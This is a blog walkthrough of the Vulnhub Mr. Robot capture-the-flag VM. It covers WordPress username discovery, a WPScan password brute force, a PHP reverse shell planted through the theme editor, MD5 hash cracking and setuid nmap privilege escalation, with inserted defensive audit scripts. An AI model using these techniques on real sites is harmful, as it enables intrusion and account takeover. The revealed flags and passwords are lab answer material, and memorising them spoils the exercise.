OSCP Prep - Vulnhub Mr. Robot Walkthrough

assume-breach
12 min read · Sep 2, 2020

Mr. Robot is a CTF that I see everywhere so I thought I would do my own write-up to find out what all the hype is about.

I am using VirtualBox to run the VM and I’m not really sure if it works on VMWare. I’m using the new Kali 2020 image in 64 bit so we’ll see if there are any compatibility issues with exploits.

This is a great prelude to the OSCP if you are doing any prep. You’ll get some good enumeration practice and learn a little bit about a common privilege escalation technique. But enough about the VM, let’s get it going!

Enumeration

Okay let’s start out with an Nmap scan to see what’s going on. I’m not using any fancy switches here, just a normal scan.

user@kali:~/Desktop$ nmap -A -sV -Pn -p- 192.168.1.200
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 13:41 EDT
Nmap scan report for 192.168.1.200
Host is up (0.0097s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.59 seconds
user@kali:~/Desktop$

Nmap shows three ports that are not filtered (note that 22 is reported closed, not open):

Port 22: SSH (closed)

Port 80: HTTP web server (Apache)

Port 443: HTTPS web server (Apache)

Let’s browse to the web server on port 80 and see if there’s anything on the homepage.

Cute.

Let’s fire up Dirb and see what we can find.

user@kali:~/Desktop$ dirb http://192.168.1.200

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Sep  1 13:52:27 2020
URL_BASE: http://192.168.1.200/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.200/ ----
==> DIRECTORY: http://192.168.1.200/0/
==> DIRECTORY: http://192.168.1.200/admin/
+ http://192.168.1.200/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.200/audio/
==> DIRECTORY: http://192.168.1.200/blog/
==> DIRECTORY: http://192.168.1.200/css/
+ http://192.168.1.200/dashboard (CODE:302|SIZE:0)
+ http://192.168.1.200/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/feed/
==> DIRECTORY: http://192.168.1.200/image/
==> DIRECTORY: http://192.168.1.200/Image/
==> DIRECTORY: http://192.168.1.200/images/
+ http://192.168.1.200/index.html (CODE:200|SIZE:1188)
+ http://192.168.1.200/index.php (CODE:301|SIZE:0)
+ http://192.168.1.200/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.1.200/js/
+ http://192.168.1.200/license (CODE:200|SIZE:19930)
+ http://192.168.1.200/login (CODE:302|SIZE:0)
+ http://192.168.1.200/page1 (CODE:301|SIZE:0)
+ http://192.168.1.200/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.1.200/rdf (CODE:301|SIZE:0)
+ http://192.168.1.200/readme (CODE:200|SIZE:7334)
+ http://192.168.1.200/robots (CODE:200|SIZE:41)
+ http://192.168.1.200/robots.txt (CODE:200|SIZE:41)
+ http://192.168.1.200/rss (CODE:301|SIZE:0)
+ http://192.168.1.200/rss2 (CODE:301|SIZE:0)
+ http://192.168.1.200/sitemap (CODE:200|SIZE:0)
+ http://192.168.1.200/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/video/
==> DIRECTORY: http://192.168.1.200/wp-admin/
+ http://192.168.1.200/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/wp-content/
+ http://192.168.1.200/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/wp-includes/
+ http://192.168.1.200/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.1.200/wp-load (CODE:200|SIZE:0)
+ http://192.168.1.200/wp-login (CODE:200|SIZE:2689)
+ http://192.168.1.200/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.1.200/wp-settings (CODE:500|SIZE:0)
+ http://192.168.1.200/wp-signup (CODE:302|SIZE:0)
+ http://192.168.1.200/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.1.200/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.1.200/0/ ----
+ http://192.168.1.200/0/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.200/0/feed/
+ http://192.168.1.200/0/index.php (CODE:301|SIZE:0)
+ http://192.168.1.200/0/rdf (CODE:301|SIZE:0)
+ http://192.168.1.200/0/rss (CODE:301|SIZE:0)
+ http://192.168.1.200/0/rss2 (CODE:301|SIZE:0)

From the output, we already see a few things that could pique our interest. The first is that the site is obviously running a WordPress blog of some sort. There are some silly things like the /intro page with a short video.

Just to make sure I didn’t miss anything, I decided to run a Nikto scan.

user@kali:~/Desktop$ nikto -h 192.168.1.200
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.200
+ Target Hostname:    192.168.1.200
+ Target Port:        80
+ Start Time:         2020-09-01 13:55:55 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.1.200/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2020-09-01 14:04:57 (GMT-4) (542 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
user@kali:~/Desktop$

This confirmed that WordPress was definitely running. A lot of the time you want to manually view the robots.txt file anyway, and since this VM is called Mr. Robot, it’s surely worth taking a peek.

Looks like the page is pointing us to a dictionary file and another txt file! Let’s see if these are directories or downloads.

The fsocity.dic is a file. I’ll go ahead and save the file to my Kali box. Let’s check key-1-of-3.txt to see if this is a directory or a download.

Looks like our first flag! All right! Let’s see what’s in the fsocity.dic file.

Seems to be a wordlist! Since the blog is running against WordPress, we can use WPScan to try to get in. Let’s give it a shot!

The initial WPScan run did not yield any usernames. Since this is a WordPress blog, let’s see if the trusty admin/admin combination gets us in.

It doesn’t look like admin/admin is going to work, which is a bummer because it is always a favorite on these CTFs. But notice that the output says admin is not a valid username: the login form is telling us whether or not a username exists, which is exactly the kind of hint an attacker wants.

This is a themed CTF so maybe elliot will work. He is the main character of the show. Let’s give that a try.

Okay, elliot is definitely a user on here. WPScan has a brute force function that we can use. The fsocity.dic file has over 800k words in it so this might take a minute.

wpscan --url http://192.168.1.200/wp-login/ --usernames elliot --passwords /home/user/Downloads/fsocity.dic

After leaving the scanner running overnight, we finally have a password. This took about six and a half hours to complete.

user@kali:~/Desktop$ wpscan --url http://192.168.1.200/wp-login/ --usernames elliot --passwords /home/user/Downloads/fsocity.dic
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://192.168.1.200/wp-login/ [192.168.1.200]
[+] Started: Tue Sep  1 15:30:23 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Powered-By: PHP/5.5.29
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.1.200/wp-login/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] This site seems to be a multisite
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | Reference: http://codex.wordpress.org/Glossary#Multisite

[+] The external WP-Cron seems to be enabled: http://192.168.1.200/wp-login/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.24 identified (Latest, released on 2020-06-10).
 | Found By: Query Parameter In Install Page (Aggressive Detection)
 |  - http://192.168.1.200/wp-includes/css/buttons.min.css?ver=4.3.24
 |  - http://192.168.1.200/wp-includes/css/dashicons.min.css?ver=4.3.24
 | Confirmed By: Query Parameter In Upgrade Page (Aggressive Detection)
 |  - http://192.168.1.200/wp-includes/css/buttons.min.css?ver=4.3.24
 |  - http://192.168.1.200/wp-includes/css/dashicons.min.css?ver=4.3.24

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:05:09 <> (12070 / 858160) 1.40% ETA: 06:01:2
Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:14:52 <> (34957 / 858160) 4.07% ETA: 05:50:2
Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:24:39 <> (57840 / 858160) 6.74% ETA: 05:41:1
[... roughly six hours of progress-bar redraws trimmed; the same candidates (6LdDSA4T..., Year2011...) keep reappearing ...]
Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 06:11:39 <> (824455 / 858160) 96.07% ETA: 00:15:
Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 06:17:04 <> (835896 / 858160) 97.40% ETA: 00:10:
[SUCCESS] - elliot / ER28-0652
Trying elliot / uHack Time: 06:27:27 <=============== > (858155 / 1716315) 49.99% ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: elliot, Password: ER28-0652

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue Sep  1 21:57:55 2020
[+] Requests Done: 858178
[+] Cached Requests: 67
[+] Data Sent: 273.714 MB
[+] Data Received: 3.358 GB
[+] Memory used: 215.199 MB
[+] Elapsed time: 06:27:32

So, after all of that, we finally have our password: ER28-0652
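One thing worth noticing in the WPScan progress output is that the same candidate strings keep turning up hour after hour, which points to a wordlist full of duplicate lines. The script below is an added example (not part of the original write-up or of WPScan): it builds a small constructed wordlist with that kind of repetition and shows how a dedup pass shrinks it. The real fsocity.dic is not embedded here; deduplicating it the same way before a credential audit cuts the number of login attempts, and therefore the run time and the noise left in the target’s logs, without dropping a single candidate.

```shell
#!/bin/sh
# Added example: measure how much a duplicate-heavy wordlist shrinks when
# deduplicated. The sample list is constructed for this demo.

# Write a constructed wordlist with repeated entries to the path in $1.
make_sample_wordlist() {
    cat > "$1" <<'EOF'
6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D
Year2011
mrrobot
6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D
elliot
Year2011
6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D
mrrobot
uHack
EOF
}

# Print the number of lines in the wordlist at $1.
count_words() {
    wc -l < "$1" | tr -d ' '
}

# Write the deduplicated list (first occurrence kept, original order
# preserved, unlike sort -u) to $2 and print the number of unique entries.
dedup_wordlist() {
    awk '!seen[$0]++' "$1" > "$2"
    count_words "$2"
}

main() {
    tmp=$(mktemp -d)
    make_sample_wordlist "$tmp/sample.dic"
    echo "raw entries:    $(count_words "$tmp/sample.dic")"
    echo "unique entries: $(dedup_wordlist "$tmp/sample.dic" "$tmp/sample-unique.dic")"
    rm -rf "$tmp"
}

main
```

On the real file the same one-liner applies: awk '!seen[$0]++' fsocity.dic > fsocity-unique.dic, then point the scanner at the smaller list.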

Let’s try to upload a php-reverse-shell from our Kali box. You can find the reverse shell at /usr/share/webshells/php/. I like putting my reverse shell in the 404.php template. You can get there by going to Themes under Appearance and then clicking Editor. Once there, the 404.php template can be selected from the menu on the right side of the screen.

Paste in your reverse shell and change the default IP and port to that of your Kali box.

Let’s set up a NetCat listener on the port we defined in our reverse shell. For me, it was port 4444.

Now, in a separate browser window, go to the 404.php template. Mine was located here:

http://192.168.1.200/wp-content/themes/twentyfifteen/404.php

And we have our reverse shell!
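The reason this works is that the WordPress dashboard lets an administrator edit theme files in place, so a stolen admin login becomes PHP execution on the server. WordPress ships a switch for that: defining DISALLOW_FILE_EDIT as true in wp-config.php removes the theme and plugin editor from the dashboard. The script below is an added example (not from the original write-up or from WordPress) that checks a wp-config.php for that setting; both config files it inspects are constructed samples.

```shell
#!/bin/sh
# Added example: check whether a wp-config.php disables the dashboard file
# editor. DISALLOW_FILE_EDIT is a real WordPress constant; the two config
# files written below are constructed samples, not files from the target.

# Minimal wp-config.php with the editor left at its default (enabled).
make_weak_config() {
    cat > "$1" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
/* That's all, stop editing! Happy blogging. */
require_once(ABSPATH . 'wp-settings.php');
EOF
}

# Same file with the editor disabled; the define must come before
# wp-settings.php is loaded, which is where it sits here.
make_hardened_config() {
    cat > "$1" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define('DISALLOW_FILE_EDIT', true);
/* That's all, stop editing! Happy blogging. */
require_once(ABSPATH . 'wp-settings.php');
EOF
}

# Return 0 if DISALLOW_FILE_EDIT is defined as true in $1, 1 otherwise.
# Accepts single or double quotes and any whitespace; a line that starts
# with a comment marker does not match because the pattern is anchored.
file_edit_disabled() {
    grep -Eq "^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*true[[:space:]]*\)" "$1"
}

# Print a one-line verdict for the config file at $1.
report_config() {
    if file_edit_disabled "$1"; then
        echo "$1: OK, dashboard file editor disabled"
    else
        echo "$1: WARNING, dashboard file editor enabled (add define('DISALLOW_FILE_EDIT', true); before wp-settings.php is required)"
    fi
}

main() {
    tmp=$(mktemp -d)
    make_weak_config "$tmp/weak-wp-config.php"
    make_hardened_config "$tmp/hardened-wp-config.php"
    report_config "$tmp/weak-wp-config.php"
    report_config "$tmp/hardened-wp-config.php"
    rm -rf "$tmp"
}

main
```

Point report_config at a real wp-config.php to check a live install. The setting does not stop an attacker who already has a shell, but it closes the specific path used above and makes a compromised admin account much less useful.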

Doing a quick whoami, I see that we are daemon. Let’s browse around a little to see what we can do! Wait, wait, wait. Before anything, let’s upgrade our shell to a TTY.

python -c 'import pty; pty.spawn("/bin/sh")'

Browsing to the /home folder, we see that there is a home folder for robot. Doing a quick ls reveals two files.

Let’s see what key-2-of-3.txt is. Probably a flag.

Oh! Permission denied! Bummer. But, password.raw.md5 is readable so let’s check that out.

Sweet! We have an MD5 hash. Let’s try to crack it. We can copy the hash and head over to CrackStation, which looks the hash up against precomputed tables rather than decrypting anything.

Awesome! Our password is abcdefghijklmnopqrstuvwxyz. And just like that, we can su to robot:
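CrackStation works because an unsalted MD5 digest of a guessable password can be matched at the speed of the hash itself, which is why plain MD5 is unsuitable for storing passwords at all. The script below is an added example (not from the original write-up or from CrackStation) that reproduces the lookup offline with md5sum: it hashes each line of a constructed candidate list and compares it with the target digest. The digest is the MD5 of the alphabet, the value the walkthrough recovers, and is also the RFC 1321 test vector.

```shell
#!/bin/sh
# Added example: offline wordlist match against an unsalted MD5 digest.
# The candidate list is constructed for this demo; the target digest is
# MD5("abcdefghijklmnopqrstuvwxyz") from RFC 1321.

TARGET_HASH="c3fcd3d76192e4007dfb496cca67e13b"

# Lowercase hex MD5 of the string in $1 (no trailing newline is hashed).
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Hash each line of the wordlist at $2 and compare with the hex digest $1.
# Prints the matching candidate and returns 0; returns 1 when the list is
# exhausted. The "|| [ -n ... ]" clause keeps a final line without a newline.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if [ "$(md5_of "$candidate")" = "$target" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed candidate list; the alphabet is fourth so the loop does
# some work before it hits.
make_candidate_list() {
    cat > "$1" <<'EOF'
password
123456
qwerty
abcdefghijklmnopqrstuvwxyz
letmein
EOF
}

main() {
    tmp=$(mktemp -d)
    make_candidate_list "$tmp/candidates.txt"
    if result=$(crack_md5 "$TARGET_HASH" "$tmp/candidates.txt"); then
        echo "match: $result"
    else
        echo "no match in candidate list"
    fi
    rm -rf "$tmp"
}

main
```

Five candidates are instant here, and a few million are still a matter of seconds, which is the whole point: a per-user salt and a deliberately slow hash (bcrypt, scrypt, Argon2) are what make this loop impractical.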

Let’s grab that flag!

Great! Now let’s see what kind of permissions we have here. I like to use linpeas.sh for easy wins. Its color-coded output makes a kernel exploit or some other simple win easy to spot.

If you don’t have linpeas.sh, you can get it below:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

I set up a python server in the directory holding my linpeas.sh script.

On the target, I find a writable folder. This is usually /tmp. I also make sure that wget is installed.

I copy over my script and make it executable.

Privilege Escalation

After running the script, we see that linpeas.sh has highlighted the kernel.

I did a little research, but ultimately, this wasn’t the way to root. Scrolling down the script, we see that nmap is highlighted.

There is a known privilege escalation trick with nmap. We can run it in interactive mode.

And we have root! Let’s get the final flag.
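What linpeas is flagging here is a setuid copy of nmap: older nmap builds had an interactive mode that can launch other programs, and when the binary carries the setuid bit those programs inherit its owner’s privileges. From the defender’s side the fix is simple (remove the bit with chmod u-s, or upgrade to an nmap without interactive mode), and the audit is a one-liner over find. The script below is an added example (not from the original write-up or from linpeas) that lists setuid executables under a directory tree and flags the ones on a short, illustrative watch list of shell-capable programs; the sample tree it audits is constructed so the script runs stand-alone.

```shell
#!/bin/sh
# Added example: find setuid executables under a tree and flag the ones on a
# watch list of programs known to hand out a shell. Run audit_suid / on a real
# host; the sample tree built below is constructed for this demo.

# Illustrative subset of shell-capable programs, not a complete catalogue.
WATCHLIST="nmap vim vi find bash sh python perl awk"

# Print every regular file under $1 with the setuid bit set, one per line.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Return 0 if the basename of $1 appears in WATCHLIST, 1 otherwise.
on_watchlist() {
    name=$(basename "$1")
    for w in $WATCHLIST; do
        [ "$name" = "$w" ] && return 0
    done
    return 1
}

# One line per setuid file: "FLAGGED <path>" for watch-listed names, with
# the fix a defender would apply, and "suid    <path>" for the rest.
audit_suid() {
    find_suid "$1" | while IFS= read -r f; do
        if on_watchlist "$f"; then
            echo "FLAGGED $f (remove the bit with: chmod u-s $f)"
        else
            echo "suid    $f"
        fi
    done
}

# Number of flagged entries under $1; prints 0 when there are none.
count_flagged() {
    audit_suid "$1" | grep -c '^FLAGGED' || true
}

# Constructed sample tree under $1: two setuid executables (one on the
# watch list) and one ordinary executable.
make_sample_tree() {
    mkdir -p "$1/bin"
    for n in nmap helper plain; do
        printf '#!/bin/sh\necho %s\n' "$n" > "$1/bin/$n"
    done
    chmod 4755 "$1/bin/nmap" "$1/bin/helper"
    chmod 755 "$1/bin/plain"
}

main() {
    tmp=$(mktemp -d)
    make_sample_tree "$tmp"
    audit_suid "$tmp"
    echo "flagged: $(count_flagged "$tmp")"
    rm -rf "$tmp"
}

main
```

On a production host the interesting output is anything flagged plus any setuid file outside the package-managed set; a periodic run diffed against a known-good baseline will catch a bit that was set after the box was built.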

This was a really fun box. The only real hiccup was the password brute forcing in the WordPress blog, but sometimes it’s like that.

I hope you enjoyed this write-up! If so, get in touch on Twitter @assume_breach or give me a follow here on Medium!

assume-breach

Security enthusiast that loves a good CTF! OSCP, CRTO, RHCSA, MCSA.